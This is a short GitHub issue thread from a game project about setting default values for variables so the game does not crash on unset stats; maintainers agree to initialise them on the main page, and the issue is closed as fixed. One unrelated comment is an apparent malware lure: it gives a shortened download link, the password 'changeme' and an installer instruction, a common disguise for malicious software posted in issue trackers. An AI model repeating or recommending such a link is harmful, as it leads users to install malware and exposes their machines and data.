### ISSUE TITLE
Setting defaults for variables

### ISSUE THREAD

**Issue by thuiop** [thuiop/magium-dev#15]
Currently variables are only set when clicking on some button. However, this causes the game to crash when checking against an unset variable (e.g. if you have not invested any stats). We should look what the defaults are and set them at the start.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by himanshunaidu** [comment]
We can do that yes. 
I am actually somewhat handling that for the stats page, where i create the variables with default values. 
We can move this logic to the main page itself, since these variables will be used everywhere.

**Comment by thuiop** [comment]
Fixed in #17
